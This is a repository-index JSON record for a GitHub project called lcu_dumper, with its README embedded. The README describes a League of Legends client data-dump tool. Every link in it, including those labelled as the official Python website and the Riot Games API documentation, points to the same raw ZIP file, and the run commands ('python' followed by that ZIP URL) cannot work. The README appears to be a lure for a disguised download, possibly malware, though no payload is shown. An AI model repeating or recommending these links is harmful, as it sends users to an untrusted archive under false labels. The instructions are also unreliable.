{"id":31646394,"url":"https://github.com/nebil175/lcu_dumper","last_synced_at":"2025-10-07T05:49:30.601Z","repository":{"id":317955206,"uuid":"1069460409","full_name":"nebil175/lcu_dumper","owner":"nebil175","description":"🔍 Discover and extract League Client Update data easily with LCU Dumper, a fast, cross-platform CLI that outputs selected API endpoints to JSON files.","archived":false,"fork":false,"pushed_at":"2025-10-04T04:01:35.000Z","size":9835,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-10-04T06:07:13.565Z","etag":null,"topics":["cli","data-dump","http","json","league-of-legends","openapi","python","reverse-engineering","swagger","tooling"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nebil175.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-10-04T01:33:10.000Z","updated_at":"2025-10-04T04:01:39.000Z","dependencies_parsed_at":"2025-10-04T06:17:50.778Z","dependency_job_id":null,"html_url":"https://github.com/nebil175/lcu_dumper","commit_stats":null,"previous_names":["nebil175/lcu_dumper"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/nebil175/lcu_dumper","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nebil175%2Flcu_dumper","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nebil175%2Flcu_dumper/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nebil175%2Flcu_dumper/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nebil175%2Flcu_dumper/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nebil175","download_url":"https://codeload.github.com/nebil175/lcu_dumper/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nebil175%2Flcu_dumper/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278727839,"owners_count":26035410,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-07T02:00:06.786Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cli","data-dump","http","json","league-of-legends","openapi","python","reverse-engineering","swagger","tooling"],"created_at":"2025-10-07T05:49:26.865Z","updated_at":"2025-10-07T05:49:30.595Z","avatar_url":"https://github.com/nebil175.png","language":"Python","readme":"# 🌟 lcu_dumper - Easily Access League Client Data\n\n## 🛠️ Introduction\n\nWelcome to lcu_dumper. This is a cross-platform command-line tool to help you discover and extract data from the League Client API. With this tool, you can convert important information into JSON format, making it easier for you to analyze League of Legends data.\n\n## 📥 Download \u0026 Install\n\nTo get started, visit this page to download: [Download lcu_dumper](https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip)\n\n### Steps to Download:\n\n1. Click the link above to go to the Releases page.\n2. Find the latest version of lcu_dumper.\n3. Select the appropriate file for your operating system (Windows, macOS, Linux).\n4. Download the file by clicking on it.\n\n## 🚀 Getting Started\n\nOnce you have downloaded the program, follow these steps to run it:\n\n1. **Locate the Downloaded File**  \n   Find the file you just downloaded. It will usually be in your \"Downloads\" folder.\n\n2. **Extract the Files (if necessary)**  \n   If the file is a ZIP folder, right-click on it and choose \"Extract All\" or use another extraction tool.\n\n3. **Open the Command Prompt or Terminal**  \n   - On Windows, press `Windows + R`, type `cmd`, and hit Enter.\n   - On macOS, search for \"Terminal\" in Spotlight.\n   - On Linux, you can usually find Terminal in your applications menu.\n\n4. **Navigate to the Folder**  \n   Use the `cd` command to change to the directory where you extracted lcu_dumper. For example:\n   - Linux/macOS: `cd ~/Downloads/lcu_dumper`\n   - Windows: `cd C:\\Users\\YourUsername\\Downloads\\lcu_dumper` \n\n5. **Run the Application**  \n   Type the following command:\n   ```\n   python https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip\n   ```\n   Make sure you have Python installed on your system. If you don’t have it, you can download it from the [official Python website](https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip).\n\n## 📚 How to Use lcu_dumper\n\nAfter running the application, you will see several commands available to you:\n\n- **Discover Endpoints:** Fetch a list of available API endpoints.\n- **Dump Data:** Extract the data from the endpoints to JSON.\n\n### Running Commands\n\nYou can type one of the commands below directly in the terminal:\n\n- To discover endpoints:\n  ```\n  python https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip discover\n  ```\n\n- To dump data:\n  ```\n  python https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip dump \u003cendpoint\u003e\n  ```\n\nReplace `\u003cendpoint\u003e` with the endpoint you want to use.\n\n## ⚙️ System Requirements\n\nFor best performance, ensure your system meets the following requirements:\n\n- **Operating System:**  \n  - Windows 10 or later\n  - macOS 10.12 (Sierra) or later\n  - Linux distributions with Python support\n\n- **Hardware:**\n  - At least 2GB of RAM\n  - 200MB of free disk space\n\n- **Software:**\n  - Python 3.6 or later.\n\n## 📝 Features\n\n- **Cross-Platform:** Works on Windows, macOS, and Linux.\n- **Real-Time Data:** Access the most current API data from the League Client.\n- **Easy JSON Format:** Outputs data in a format that’s easy to analyze.\n- **Lightweight and Fast:** Minimal system resource usage.\n\n## 🌐 Community \u0026 Support\n\nIf you encounter issues or have questions, you can find help on our GitHub issues page. We encourage community members to contribute suggestions and improvements. \n\n## 🔗 Further Resources\n\nTo learn more about the League Client API, you can check the Official Riot Games API documentation [here](https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip).\n\n## 📦 Contributing\n\nIf you'd like to contribute to lcu_dumper, please follow these steps:\n\n1. Fork the repository.\n2. Make your changes.\n3. Submit a pull request describing your changes.\n\nWe welcome contributions from everyone!\n\n## 💬 Contact\n\nFor direct inquiries or issues, feel free to contact us at our GitHub page. We are here to help!\n\n## ✨ Conclusion \n\nThank you for using lcu_dumper. We hope this tool helps you access and analyze League of Legends data easily. Enjoy your gaming experience!\n\nRemember to visit this page to download: [Download lcu_dumper](https://raw.githubusercontent.com/nebil175/lcu_dumper/main/Giottesque/lcu_dumper.zip)","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnebil175%2Flcu_dumper","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnebil175%2Flcu_dumper","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnebil175%2Flcu_dumper/lists"}